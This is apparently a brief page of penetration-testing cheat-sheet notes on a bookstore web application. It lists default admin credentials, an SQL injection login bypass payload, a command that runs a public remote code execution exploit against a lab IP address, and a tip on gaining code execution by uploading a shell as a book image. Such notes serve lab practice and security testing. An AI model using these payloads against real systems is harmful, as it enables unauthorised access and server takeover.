> For the complete documentation index, see [llms.txt](https://kashz.gitbook.io/kashz-jewels/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://kashz.gitbook.io/kashz-jewels/services/cse-online-bookstore.md).

# cse online bookstore

### Default Creds

```bash
admin:admin
```

## v1.0

```
https://www.exploit-db.com/exploits/48960 - Auth Bypass
using admin:%' or '1'='1 

https://www.exploit-db.com/exploits/47887 - Unauth RCE
$ python3 47887.py http://192.168.129.111/store/

# Authenticated RCE
# change image for a book and upload shell
```
